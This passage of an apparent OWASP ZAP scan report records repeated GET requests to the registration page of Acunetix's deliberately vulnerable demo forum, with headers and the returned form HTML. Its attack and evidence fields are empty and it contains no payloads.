cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input 